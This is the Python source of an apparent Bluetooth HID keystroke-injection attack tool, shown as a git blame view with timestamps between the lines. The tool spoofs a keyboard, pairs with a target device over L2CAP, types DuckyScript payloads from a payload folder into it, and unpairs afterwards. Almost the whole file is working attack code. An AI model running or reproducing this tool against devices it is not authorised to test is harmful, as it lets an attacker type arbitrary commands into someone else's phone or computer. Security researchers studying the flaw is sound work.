2024-03-31 18:14:46 +00:00
import binascii , bluetooth , sys , time , datetime , logging , argparse
2024-01-17 01:21:00 +00:00
from multiprocessing import Process
2024-01-16 06:52:55 +00:00
from pydbus import SystemBus
2024-01-17 01:21:00 +00:00
from enum import Enum
2024-05-15 23:13:53 +00:00
import subprocess
2024-04-07 15:55:23 +00:00
import os
2024-01-16 06:52:55 +00:00
2024-08-21 16:49:32 +00:00
from utils . color import color
2024-02-05 20:22:13 +00:00
from utils . menu_functions import ( main_menu , read_duckyscript , run , restart_bluetooth_daemon , get_target_address )
2024-01-17 01:21:00 +00:00
from utils . register_device import register_hid_profile , agent_loop
2024-01-16 06:52:55 +00:00
2024-01-17 01:21:00 +00:00
child_processes = [ ]
2024-01-16 06:52:55 +00:00
2024-01-19 08:55:29 +00:00
# Custom log level
NOTICE_LEVEL = 25
# Custom formatter class with added color for NOTICE
class ColorLogFormatter ( logging . Formatter ) :
COLOR_MAP = {
2024-08-21 16:49:32 +00:00
logging . DEBUG : color . BLUE ,
logging . INFO : color . GREEN ,
logging . WARNING : color . YELLOW ,
logging . ERROR : color . RED ,
logging . CRITICAL : color . RED ,
NOTICE_LEVEL : color . BLUE , # Color for NOTICE level
2024-01-19 08:55:29 +00:00
}
def format ( self , record ) :
2024-08-21 16:49:32 +00:00
fmt_color = self . COLOR_MAP . get ( record . levelno , color . WHITE )
2024-01-19 08:55:29 +00:00
message = super ( ) . format ( record )
2024-08-21 16:49:32 +00:00
return f ' { fmt_color } { message } { color . RESET } '
2024-01-19 08:55:29 +00:00
# Method to add to the Logger class
def notice ( self , message , * args , * * kwargs ) :
if self . isEnabledFor ( NOTICE_LEVEL ) :
self . _log ( NOTICE_LEVEL , message , args , * * kwargs )
# Adding custom level and method to logging
logging . addLevelName ( NOTICE_LEVEL , " NOTICE " )
logging . Logger . notice = notice
# Set up logging with color formatter and custom level
def setup_logging ( ) :
log_format = " %(asctime)s - %(levelname)s - %(message)s "
formatter = ColorLogFormatter ( log_format )
handler = logging . StreamHandler ( )
handler . setFormatter ( formatter )
# Set the logging level to INFO to filter out DEBUG messages
logging . basicConfig ( level = logging . INFO , handlers = [ handler ] )
2024-01-16 06:52:55 +00:00
class ConnectionFailureException ( Exception ) :
pass
class Adapter :
2024-01-17 01:21:00 +00:00
def __init__ ( self , iface ) :
self . iface = iface
self . bus = SystemBus ( )
self . adapter = self . _get_adapter ( iface )
2024-01-16 06:52:55 +00:00
2024-01-17 01:21:00 +00:00
def _get_adapter ( self , iface ) :
try :
return self . bus . get ( " org.bluez " , f " /org/bluez/ { iface } " )
except KeyError :
log . error ( f " Unable to find adapter ' { iface } ' , aborting. " )
raise ConnectionFailureException ( " Adapter not found " )
def _run_command ( self , command ) :
result = run ( command )
if result . returncode != 0 :
raise ConnectionFailureException ( f " Failed to execute command: { ' ' . join ( command ) } . Error: { result . stderr } " )
def set_property ( self , prop , value ) :
# Convert value to string if it's not
value_str = str ( value ) if not isinstance ( value , str ) else value
command = [ " sudo " , " hciconfig " , self . iface , prop , value_str ]
self . _run_command ( command )
# Verify if the property is set correctly
verify_command = [ " hciconfig " , self . iface , prop ]
verification_result = run ( verify_command )
if value_str not in verification_result . stdout :
log . error ( f " Unable to set adapter { prop } , aborting. Output: { verification_result . stdout } " )
raise ConnectionFailureException ( f " Failed to set { prop } " )
def power ( self , powered ) :
self . adapter . Powered = powered
def reset ( self ) :
self . power ( False )
self . power ( True )
def enable_ssp ( self ) :
try :
# Command to enable SSP - the actual command might differ
# This is a placeholder command and should be replaced with the actual one.
ssp_command = [ " sudo " , " hciconfig " , self . iface , " sspmode " , " 1 " ]
ssp_result = run ( ssp_command )
if ssp_result . returncode != 0 :
log . error ( f " Failed to enable SSP: { ssp_result . stderr } " )
raise ConnectionFailureException ( " Failed to enable SSP " )
except Exception as e :
log . error ( f " Error enabling SSP: { e } " )
raise
2024-01-16 06:52:55 +00:00
2024-01-17 01:21:00 +00:00
class PairingAgent :
def __init__ ( self , iface , target_addr ) :
self . iface = iface
self . target_addr = target_addr
dev_name = " dev_ %s " % target_addr . upper ( ) . replace ( " : " , " _ " )
self . target_path = " /org/bluez/ %s / %s " % ( iface , dev_name )
2024-01-16 06:52:55 +00:00
2024-01-17 01:21:00 +00:00
def __enter__ ( self ) :
try :
log . debug ( " Starting agent process... " )
self . agent = Process ( target = agent_loop , args = ( self . target_path , ) )
self . agent . start ( )
time . sleep ( 0.25 )
log . debug ( " Agent process started. " )
return self
except Exception as e :
log . error ( f " Error starting agent process: { e } " )
raise
def __exit__ ( self , exc_type , exc_val , exc_tb ) :
try :
log . debug ( " Terminating agent process... " )
self . agent . kill ( )
2024-01-19 08:26:32 +00:00
time . sleep ( 2 )
2024-01-17 01:21:00 +00:00
log . debug ( " Agent process terminated. " )
except Exception as e :
log . error ( f " Error terminating agent process: { e } " )
raise
2024-01-16 06:52:55 +00:00
2024-01-19 03:13:29 +00:00
class L2CAPConnectionManager :
def __init__ ( self , target_address ) :
self . target_address = target_address
self . clients = { }
def create_connection ( self , port ) :
client = L2CAPClient ( self . target_address , port )
self . clients [ port ] = client
return client
def connect_all ( self ) :
try :
return sum ( client . connect ( ) for client in self . clients . values ( ) )
except ConnectionFailureException as e :
log . error ( f " Connection failure: { e } " )
raise
def close_all ( self ) :
for client in self . clients . values ( ) :
client . close ( )
2024-01-19 07:39:59 +00:00
# Custom exception to handle reconnection
class ReconnectionRequiredException ( Exception ) :
def __init__ ( self , message , current_line = 0 , current_position = 0 ) :
super ( ) . __init__ ( message )
time . sleep ( 2 )
self . current_line = current_line
self . current_position = current_position
2024-01-16 06:52:55 +00:00
class L2CAPClient :
def __init__ ( self , addr , port ) :
self . addr = addr
self . port = port
self . connected = False
self . sock = None
2024-01-17 01:21:00 +00:00
def encode_keyboard_input ( * args ) :
keycodes = [ ]
flags = 0
for a in args :
if isinstance ( a , Key_Codes ) :
keycodes . append ( a . value )
elif isinstance ( a , Modifier_Codes ) :
flags | = a . value
assert ( len ( keycodes ) < = 7 )
keycodes + = [ 0 ] * ( 7 - len ( keycodes ) )
report = bytes ( [ 0xa1 , 0x01 , flags , 0x00 ] + keycodes )
return report
2024-01-16 06:52:55 +00:00
def close ( self ) :
if self . connected :
self . sock . close ( )
self . connected = False
self . sock = None
2024-01-19 07:39:59 +00:00
def reconnect ( self ) :
# Notify the main script or trigger a reconnection process
raise ReconnectionRequiredException ( " Reconnection required " )
2024-01-16 06:52:55 +00:00
def send ( self , data ) :
2024-01-17 01:21:00 +00:00
if not self . connected :
log . error ( " [TX] Not connected " )
2024-01-19 07:39:59 +00:00
self . reconnect ( )
# Get the current timestamp
timestamp = datetime . datetime . now ( ) . strftime ( " % Y- % m- %d % H: % M: % S. %f " ) [ : - 3 ]
2024-01-17 01:21:00 +00:00
2024-01-19 07:39:59 +00:00
# Add the timestamp to your log message
log . debug ( f " [ { timestamp } ][TX- { self . port } ] Attempting to send data: { binascii . hexlify ( data ) . decode ( ) } " )
try :
self . attempt_send ( data )
2024-01-17 01:21:00 +00:00
log . debug ( f " [TX- { self . port } ] Data sent successfully " )
2024-01-19 07:39:59 +00:00
except bluetooth . btcommon . BluetoothError as ex :
log . error ( f " [TX- { self . port } ] Bluetooth error: { ex } " )
self . reconnect ( )
self . send ( data ) # Retry sending after reconnection
except Exception as ex :
log . error ( f " [TX- { self . port } ] Exception: { ex } " )
raise
2024-01-17 01:21:00 +00:00
2024-01-19 07:39:59 +00:00
def attempt_send ( self , data , timeout = 0.5 ) :
2024-01-16 06:52:55 +00:00
start = time . time ( )
2024-01-17 01:21:00 +00:00
while time . time ( ) - start < timeout :
2024-01-16 06:52:55 +00:00
try :
self . sock . send ( data )
2024-01-19 07:39:59 +00:00
return
2024-01-16 06:52:55 +00:00
except bluetooth . btcommon . BluetoothError as ex :
if ex . errno != 11 : # no data available
2024-01-19 07:39:59 +00:00
raise
2024-01-16 06:52:55 +00:00
time . sleep ( 0.001 )
def recv ( self , timeout = 0 ) :
start = time . time ( )
while True :
raw = None
if not self . connected :
return None
if self . sock is None :
return None
try :
raw = self . sock . recv ( 64 )
if len ( raw ) == 0 :
self . connected = False
return None
log . debug ( f " [RX- { self . port } ] Received data: { binascii . hexlify ( raw ) . decode ( ) } " )
except bluetooth . btcommon . BluetoothError as ex :
if ex . errno != 11 : # no data available
raise ex
else :
if ( time . time ( ) - start ) < timeout :
continue
return raw
def connect ( self , timeout = None ) :
log . debug ( f " Attempting to connect to { self . addr } on port { self . port } " )
2024-01-19 08:55:29 +00:00
log . info ( " connecting to %s on port %d " % ( self . addr , self . port ) )
2024-01-16 06:52:55 +00:00
sock = bluetooth . BluetoothSocket ( bluetooth . L2CAP )
sock . settimeout ( timeout )
try :
sock . connect ( ( self . addr , self . port ) )
sock . setblocking ( 0 )
self . sock = sock
self . connected = True
log . debug ( " SUCCESS! connected on port %d " % self . port )
except Exception as ex :
2024-05-15 23:13:53 +00:00
error = True
2024-01-16 06:52:55 +00:00
self . connected = False
log . error ( " ERROR connecting on port %d : %s " % ( self . port , ex ) )
raise ConnectionFailureException ( f " Connection failure on port { self . port } " )
2024-05-15 23:13:53 +00:00
if ( error == True & self . port == 14 ) :
2024-08-21 16:49:32 +00:00
print ( f " { color . RESET } [ { color . RED } ! { color . RESET } ] { color . RED } CRITICAL ERROR { color . RESET } : { color . RESET } Attempted Connection to { color . RED } { target_address } { color . RESET } was { color . RED } denied { color . RESET } . " )
2024-05-15 23:13:53 +00:00
return self . connected
2024-01-16 06:52:55 +00:00
return self . connected
def send_keyboard_report ( self , * args ) :
self . send ( self . encode_keyboard_input ( * args ) )
2024-01-19 08:26:32 +00:00
def send_keypress ( self , * args , delay = 0.0001 ) :
2024-01-17 01:21:00 +00:00
if args :
log . debug ( f " Attempting to send... { args } " )
self . send ( self . encode_keyboard_input ( * args ) )
2024-01-19 08:29:39 +00:00
time . sleep ( delay )
# Send an empty report to release the key
self . send ( self . encode_keyboard_input ( ) )
time . sleep ( delay )
2024-01-17 01:21:00 +00:00
else :
# If no arguments, send an empty report to release keys
self . send ( self . encode_keyboard_input ( ) )
time . sleep ( delay )
2024-01-19 07:39:59 +00:00
return True # Indicate successful send
2024-01-17 01:21:00 +00:00
2024-01-19 07:39:59 +00:00
def send_keyboard_combination ( self , modifier , key , delay = 0.004 ) :
2024-01-19 03:13:29 +00:00
# Press the combination
press_report = self . encode_keyboard_input ( modifier , key )
self . send ( press_report )
time . sleep ( delay ) # Delay to simulate key press
# Release the combination
release_report = self . encode_keyboard_input ( )
self . send ( release_report )
2024-01-17 01:21:00 +00:00
time . sleep ( delay )
2024-01-19 07:39:59 +00:00
def process_duckyscript ( client , duckyscript , current_line = 0 , current_position = 0 ) :
client . send_keypress ( ' ' ) # Send empty report to ensure a clean start
2024-01-19 03:13:29 +00:00
time . sleep ( 0.5 )
2024-01-16 06:52:55 +00:00
2024-01-19 03:13:29 +00:00
shift_required_characters = " !@#$ % ^&*()_+ {} |: \" <>?ABCDEFGHIJKLMNOPQRSTUVWXYZ "
2024-01-16 06:52:55 +00:00
2024-01-19 07:39:59 +00:00
try :
for line_number , line in enumerate ( duckyscript ) :
if line_number < current_line :
continue # Skip already processed lines
2024-01-16 06:52:55 +00:00
2024-01-19 07:39:59 +00:00
if line_number == current_line and current_position > 0 :
line = line [ current_position : ] # Resume from the last position within the current line
else :
current_position = 0 # Reset position for new line
line = line . strip ( )
2024-01-19 08:55:29 +00:00
log . info ( f " Processing { line } " )
2024-01-19 07:39:59 +00:00
if not line or line . startswith ( " REM " ) :
continue
if line . startswith ( " TAB " ) :
client . send_keypress ( Key_Codes . TAB )
if line . startswith ( " PRIVATE_BROWSER " ) :
report = bytes ( [ 0xa1 , 0x01 , Modifier_Codes . CTRL . value | Modifier_Codes . SHIFT . value , 0x00 , Key_Codes . n . value , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 ] )
client . send ( report )
# Don't forget to send a release report afterwards
release_report = bytes ( [ 0xa1 , 0x01 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 , 0x00 ] )
client . send ( release_report )
if line . startswith ( " VOLUME_UP " ) :
# Send GUI + V
hid_report_gui_v = bytes . fromhex ( " a1010800190000000000 " )
client . send ( hid_report_gui_v )
time . sleep ( 0.1 ) # Short delay
client . send_keypress ( Key_Codes . TAB )
# Press UP while holding GUI + V
hid_report_up = bytes . fromhex ( " a1010800195700000000 " )
client . send ( hid_report_up )
time . sleep ( 0.1 ) # Short delayF
# Release all keys
hid_report_release = bytes . fromhex ( " a1010000000000000000 " )
client . send ( hid_report_release )
if line . startswith ( " DELAY " ) :
2024-01-19 03:13:29 +00:00
try :
2024-01-19 07:39:59 +00:00
# Extract delay time from the line
delay_time = int ( line . split ( ) [ 1 ] ) # Assumes delay time is in milliseconds
time . sleep ( delay_time / 1000 ) # Convert milliseconds to seconds for sleep
except ValueError :
log . error ( f " Invalid DELAY format in line: { line } " )
except IndexError :
log . error ( f " DELAY command requires a time parameter in line: { line } " )
continue # Move to the next line after the delay
if line . startswith ( " STRING " ) :
text = line [ 7 : ]
for char_position , char in enumerate ( text , start = 1 ) :
2024-01-19 08:55:29 +00:00
log . notice ( f " Attempting to send letter: { char } " )
2024-01-19 07:39:59 +00:00
# Process each character
try :
if char . isdigit ( ) :
key_code = getattr ( Key_Codes , f " _ { char } " )
2024-01-19 03:13:29 +00:00
client . send_keypress ( key_code )
2024-01-19 07:39:59 +00:00
elif char == " " :
client . send_keypress ( Key_Codes . SPACE )
elif char == " [ " :
client . send_keypress ( Key_Codes . LEFTBRACE )
elif char == " ] " :
client . send_keypress ( Key_Codes . RIGHTBRACE )
elif char == " ; " :
client . send_keypress ( Key_Codes . SEMICOLON )
elif char == " ' " :
client . send_keypress ( Key_Codes . QUOTE )
elif char == " / " :
client . send_keypress ( Key_Codes . SLASH )
elif char == " . " :
client . send_keypress ( Key_Codes . DOT )
elif char == " , " :
client . send_keypress ( Key_Codes . COMMA )
elif char == " | " :
client . send_keypress ( Key_Codes . PIPE )
elif char == " - " :
client . send_keypress ( Key_Codes . MINUS )
elif char == " = " :
client . send_keypress ( Key_Codes . EQUAL )
elif char in shift_required_characters :
key_code_str = char_to_key_code ( char )
if key_code_str :
key_code = getattr ( Key_Codes , key_code_str )
client . send_keyboard_combination ( Modifier_Codes . SHIFT , key_code )
else :
log . warning ( f " Unsupported character ' { char } ' in Duckyscript " )
elif char . isalpha ( ) :
key_code = getattr ( Key_Codes , char . lower ( ) )
if char . isupper ( ) :
client . send_keyboard_combination ( Modifier_Codes . SHIFT , key_code )
else :
client . send_keypress ( key_code )
2024-01-19 03:13:29 +00:00
else :
2024-01-19 07:39:59 +00:00
key_code = char_to_key_code ( char )
if key_code :
client . send_keypress ( key_code )
else :
log . warning ( f " Unsupported character ' { char } ' in Duckyscript " )
2024-01-19 08:26:32 +00:00
2024-01-19 07:39:59 +00:00
current_position = char_position
except AttributeError as e :
log . warning ( f " Attribute error: { e } - Unsupported character ' { char } ' in Duckyscript " )
elif any ( mod in line for mod in [ " SHIFT " , " ALT " , " CTRL " , " GUI " , " COMMAND " , " WINDOWS " ] ) :
# Process modifier key combinations
components = line . split ( )
if len ( components ) == 2 :
modifier , key = components
try :
# Convert to appropriate enums
modifier_enum = getattr ( Modifier_Codes , modifier . upper ( ) )
key_enum = getattr ( Key_Codes , key . lower ( ) )
client . send_keyboard_combination ( modifier_enum , key_enum )
2024-01-19 08:55:29 +00:00
log . notice ( f " Sent combination: { line } " )
2024-01-19 07:39:59 +00:00
except AttributeError :
log . warning ( f " Unsupported combination: { line } " )
else :
log . warning ( f " Invalid combination format: { line } " )
elif line . startswith ( " ENTER " ) :
client . send_keypress ( Key_Codes . ENTER )
# After processing each line, reset current_position to 0 and increment current_line
current_position = 0
current_line + = 1
except ReconnectionRequiredException :
raise ReconnectionRequiredException ( " Reconnection required " , current_line , current_position )
except Exception as e :
log . error ( f " Error during script execution: { e } " )
2024-01-19 03:13:29 +00:00
def char_to_key_code ( char ) :
# Mapping for special characters that always require SHIFT
shift_char_map = {
' ! ' : ' EXCLAMATION_MARK ' ,
' @ ' : ' AT_SYMBOL ' ,
' # ' : ' HASHTAG ' ,
' $ ' : ' DOLLAR ' ,
' % ' : ' PERCENT_SYMBOL ' ,
' ^ ' : ' CARET_SYMBOL ' ,
' & ' : ' AMPERSAND_SYMBOL ' ,
' * ' : ' ASTERISK_SYMBOL ' ,
' ( ' : ' OPEN_PARENTHESIS ' ,
' ) ' : ' CLOSE_PARENTHESIS ' ,
' _ ' : ' UNDERSCORE_SYMBOL ' ,
' + ' : ' KEYPADPLUS ' ,
' { ' : ' LEFTBRACE ' ,
' } ' : ' RIGHTBRACE ' ,
' : ' : ' SEMICOLON ' ,
' \\ ' : ' BACKSLASH ' ,
' " ' : ' QUOTE ' ,
' < ' : ' COMMA ' ,
' > ' : ' DOT ' ,
' ? ' : ' QUESTIONMARK ' ,
' A ' : ' a ' ,
' B ' : ' b ' ,
' C ' : ' c ' ,
' D ' : ' d ' ,
' E ' : ' e ' ,
' F ' : ' f ' ,
' G ' : ' g ' ,
' H ' : ' h ' ,
' I ' : ' i ' ,
' J ' : ' j ' ,
' K ' : ' k ' ,
' L ' : ' l ' ,
' M ' : ' m ' ,
' N ' : ' n ' ,
' O ' : ' o ' ,
' P ' : ' p ' ,
' Q ' : ' q ' ,
' R ' : ' r ' ,
' S ' : ' s ' ,
' T ' : ' t ' ,
' U ' : ' u ' ,
' V ' : ' v ' ,
' W ' : ' w ' ,
' X ' : ' x ' ,
' Y ' : ' y ' ,
' Z ' : ' z ' ,
}
return shift_char_map . get ( char )
2024-01-16 06:52:55 +00:00
2024-01-19 03:13:29 +00:00
# Key codes for modifier keys
class Modifier_Codes ( Enum ) :
CTRL = 0x01
RIGHTCTRL = 0x10
2024-01-16 06:52:55 +00:00
2024-01-19 03:13:29 +00:00
SHIFT = 0x02
RIGHTSHIFT = 0x20
2024-01-16 06:52:55 +00:00
2024-01-19 03:13:29 +00:00
ALT = 0x04
RIGHTALT = 0x40
2024-01-17 01:21:00 +00:00
2024-01-19 03:13:29 +00:00
GUI = 0x08
WINDOWS = 0x08
COMMAND = 0x08
RIGHTGUI = 0x80
2024-01-17 01:21:00 +00:00
class Key_Codes ( Enum ) :
NONE = 0x00
2024-01-19 03:13:29 +00:00
a = 0x04
b = 0x05
c = 0x06
d = 0x07
e = 0x08
f = 0x09
g = 0x0a
h = 0x0b
i = 0x0c
j = 0x0d
k = 0x0e
l = 0x0f
m = 0x10
n = 0x11
o = 0x12
p = 0x13
q = 0x14
r = 0x15
s = 0x16
t = 0x17
u = 0x18
v = 0x19
w = 0x1a
x = 0x1b
y = 0x1c
z = 0x1d
2024-01-17 01:21:00 +00:00
_1 = 0x1e
_2 = 0x1f
_3 = 0x20
_4 = 0x21
_5 = 0x22
_6 = 0x23
_7 = 0x24
_8 = 0x25
_9 = 0x26
_0 = 0x27
ENTER = 0x28
ESCAPE = 0x29
BACKSPACE = 0x2a
TAB = 0x2b
SPACE = 0x2c
MINUS = 0x2d
EQUAL = 0x2e
LEFTBRACE = 0x2f
RIGHTBRACE = 0x30
2024-01-19 03:13:29 +00:00
CAPSLOCK = 0x39
2024-01-19 07:39:59 +00:00
VOLUME_UP = 0x3b
2024-01-19 03:13:29 +00:00
VOLUME_DOWN = 0xee
2024-01-17 01:21:00 +00:00
SEMICOLON = 0x33
COMMA = 0x36
2024-01-19 03:13:29 +00:00
PERIOD = 0x37
2024-01-17 01:21:00 +00:00
SLASH = 0x38
2024-01-19 03:13:29 +00:00
PIPE = 0x31
BACKSLASH = 0x31
GRAVE = 0x35
APOSTROPHE = 0x34
LEFT_BRACKET = 0x2f
RIGHT_BRACKET = 0x30
DOT = 0x37
2024-01-19 07:39:59 +00:00
RIGHT = 0x4f
LEFT = 0x50
DOWN = 0x51
UP = 0x52
2024-01-17 01:21:00 +00:00
2024-01-19 03:13:29 +00:00
# SHIFT KEY MAPPING
EXCLAMATION_MARK = 0x1e
AT_SYMBOL = 0x1f
HASHTAG = 0x20
DOLLAR = 0x21
PERCENT_SYMBOL = 0x22
CARET_SYMBOL = 0x23
AMPERSAND_SYMBOL = 0x24
ASTERISK_SYMBOL = 0x25
OPEN_PARENTHESIS = 0x26
CLOSE_PARENTHESIS = 0x27
UNDERSCORE_SYMBOL = 0x2d
QUOTE = 0x34
QUESTIONMARK = 0x38
KEYPADPLUS = 0x57
2024-01-17 01:21:00 +00:00
2024-01-19 03:13:29 +00:00
def terminate_child_processes ( ) :
for proc in child_processes :
if proc . is_alive ( ) :
proc . terminate ( )
proc . join ( )
2024-05-15 23:13:53 +00:00
2024-01-17 01:21:00 +00:00
2024-03-31 18:14:46 +00:00
def setup_bluetooth ( target_address , adapter_id ) :
2024-01-19 03:13:29 +00:00
restart_bluetooth_daemon ( )
2024-03-31 18:14:46 +00:00
profile_proc = Process ( target = register_hid_profile , args = ( adapter_id , target_address ) )
2024-01-19 03:13:29 +00:00
profile_proc . start ( )
child_processes . append ( profile_proc )
2024-03-31 18:14:46 +00:00
adapter = Adapter ( adapter_id )
2024-01-19 03:13:29 +00:00
adapter . set_property ( " name " , " Robot POC " )
adapter . set_property ( " class " , 0x002540 )
adapter . power ( True )
return adapter
2024-01-17 01:21:00 +00:00
def initialize_pairing ( agent_iface , target_address ) :
try :
with PairingAgent ( agent_iface , target_address ) as agent :
log . debug ( " Pairing agent initialized " )
except Exception as e :
log . error ( f " Failed to initialize pairing agent: { e } " )
raise ConnectionFailureException ( " Pairing agent initialization failed " )
def establish_connections ( connection_manager ) :
if not connection_manager . connect_all ( ) :
raise ConnectionFailureException ( " Failed to connect to all required ports " )
2024-01-16 06:52:55 +00:00
2024-03-31 18:14:46 +00:00
def setup_and_connect ( connection_manager , target_address , adapter_id ) :
2024-01-19 07:39:59 +00:00
connection_manager . create_connection ( 1 ) # SDP
connection_manager . create_connection ( 17 ) # HID Control
connection_manager . create_connection ( 19 ) # HID Interrupt
2024-03-31 18:14:46 +00:00
initialize_pairing ( adapter_id , target_address )
2024-01-19 07:39:59 +00:00
establish_connections ( connection_manager )
return connection_manager . clients [ 19 ]
2024-05-15 23:13:53 +00:00
def troubleshoot_bluetooth ( ) :
# Added this function to troubleshoot common issues before access to the application is granted
# Check if bluetoothctl is available
try :
subprocess . run ( [ ' bluetoothctl ' , ' --version ' ] , check = True , stdout = subprocess . PIPE )
except subprocess . CalledProcessError :
2024-08-21 16:49:32 +00:00
print ( f " { color . RESET } [ { color . RED } ! { color . RESET } ] { color . RED } CRITICAL { color . RESET } : { color . BLUE } bluetoothctl { color . RESET } is not installed or not working properly. " )
2024-05-15 23:13:53 +00:00
return False
# Check for Bluetooth adapters
result = subprocess . run ( [ ' bluetoothctl ' , ' list ' ] , capture_output = True , text = True )
if " Controller " not in result . stdout :
2024-08-21 16:49:32 +00:00
print ( f " { color . RESET } [ { color . RED } ! { color . RESET } ] { color . RED } CRITICAL { color . RESET } : No { color . BLUE } Bluetooth adapters { color . RESET } have been detected. " )
2024-05-15 23:13:53 +00:00
return False
# List devices to see if any are connected
result = subprocess . run ( [ ' bluetoothctl ' , ' devices ' ] , capture_output = True , text = True )
if " Device " not in result . stdout :
2024-08-21 16:49:32 +00:00
print ( f " { color . RESET } [ { color . RED } ! { color . RESET } ] { color . YELLOW } WARNING { color . RESET } : Your { color . BLUE } Bluetooth devices { color . RESET } might not be supported. " )
2024-08-21 16:34:24 +00:00
time . sleep ( 2 )
2024-05-15 23:13:53 +00:00
return True
2024-01-16 06:52:55 +00:00
# Main function
def main ( ) :
2024-03-31 18:14:46 +00:00
parser = argparse . ArgumentParser ( description = " Bluetooth HID Attack Tool " )
parser . add_argument ( ' --adapter ' , type = str , default = ' hci0 ' , help = ' Specify the Bluetooth adapter to use (default: hci0) ' )
args = parser . parse_args ( )
adapter_id = args . adapter
2024-01-16 06:52:55 +00:00
main_menu ( )
2024-01-17 01:21:00 +00:00
target_address = get_target_address ( )
if not target_address :
2024-05-15 23:13:53 +00:00
log . info ( " No target address provided. Exiting.. " )
2024-01-16 06:52:55 +00:00
return
2024-04-07 15:55:23 +00:00
script_directory = os . path . dirname ( os . path . realpath ( __file__ ) )
payload_folder = os . path . join ( script_directory , ' payloads/ ' ) # Specify the relative path to the payloads folder.
payloads = os . listdir ( payload_folder )
2024-08-21 16:49:32 +00:00
print ( f " \n Available payloads { color . BLUE } : " )
2024-04-07 15:55:23 +00:00
for idx , payload_file in enumerate ( payloads , 1 ) : # Check and enumerate the files inside the payload folder.
2024-08-21 16:49:32 +00:00
print ( f " { color . RESET } [ { color . BLUE } { idx } { color . RESET } ] { color . BLUE } : { color . BLUE } { payload_file } " )
2024-01-16 06:52:55 +00:00
2024-08-21 16:49:32 +00:00
payload_choice = input ( f " \n { color . BLUE } Enter the number that represents the payload you would like to load { color . RESET } : { color . BLUE } " )
2024-04-07 15:55:23 +00:00
selected_payload = None
try :
payload_index = int ( payload_choice ) - 1
selected_payload = os . path . join ( payload_folder , payloads [ payload_index ] )
except ( ValueError , IndexError ) :
2024-05-15 23:13:53 +00:00
print ( f " Invalid payload choice. No payload selected. " )
2024-04-07 15:55:23 +00:00
if selected_payload is not None :
2024-08-21 16:49:32 +00:00
print ( f " { color . BLUE } Selected payload { color . RESET } : { color . BLUE } { selected_payload } " )
2024-04-07 15:55:23 +00:00
duckyscript = read_duckyscript ( selected_payload )
else :
2024-08-21 16:49:32 +00:00
print ( f " { color . RED } No payload selected. " )
2024-05-15 23:13:53 +00:00
2024-04-07 15:55:23 +00:00
2024-01-16 06:52:55 +00:00
if not duckyscript :
log . info ( " Payload file not found. Exiting. " )
return
2024-03-31 18:14:46 +00:00
adapter = setup_bluetooth ( target_address , adapter_id )
2024-01-16 06:52:55 +00:00
adapter . enable_ssp ( )
2024-01-19 07:39:59 +00:00
current_line = 0
current_position = 0
connection_manager = L2CAPConnectionManager ( target_address )
2024-01-16 06:52:55 +00:00
2024-01-19 07:39:59 +00:00
while True :
try :
2024-03-31 18:14:46 +00:00
hid_interrupt_client = setup_and_connect ( connection_manager , target_address , adapter_id )
2024-01-19 07:39:59 +00:00
process_duckyscript ( hid_interrupt_client , duckyscript , current_line , current_position )
2024-01-19 08:26:32 +00:00
time . sleep ( 2 )
2024-01-19 07:39:59 +00:00
break # Exit loop if successful
2024-05-15 23:13:53 +00:00
2024-01-19 07:39:59 +00:00
except ReconnectionRequiredException as e :
2024-08-21 16:49:32 +00:00
log . info ( f " { color . RESET } Reconnection required. Attempting to reconnect { color . BLUE } ... " )
2024-01-19 07:39:59 +00:00
current_line = e . current_line
current_position = e . current_position
connection_manager . close_all ( )
# Sleep before retrying to avoid rapid reconnection attempts
time . sleep ( 2 )
2024-05-15 23:13:53 +00:00
finally :
# unpair the target device
command = f ' echo -e " remove { target_address } \n " | bluetoothctl '
subprocess . run ( command , shell = True )
2024-08-21 16:49:32 +00:00
print ( f " { color . BLUE } Successfully Removed device { color . RESET } : { color . BLUE } { target_address } { color . RESET } " )
2024-01-16 06:52:55 +00:00
if __name__ == " __main__ " :
2024-01-19 08:55:29 +00:00
setup_logging ( )
log = logging . getLogger ( __name__ )
2024-01-16 06:52:55 +00:00
try :
2024-05-15 23:13:53 +00:00
if troubleshoot_bluetooth ( ) :
main ( )
else :
sys . exit ( 0 )
2024-01-16 06:52:55 +00:00
finally :
2024-04-07 15:55:23 +00:00
terminate_child_processes ( )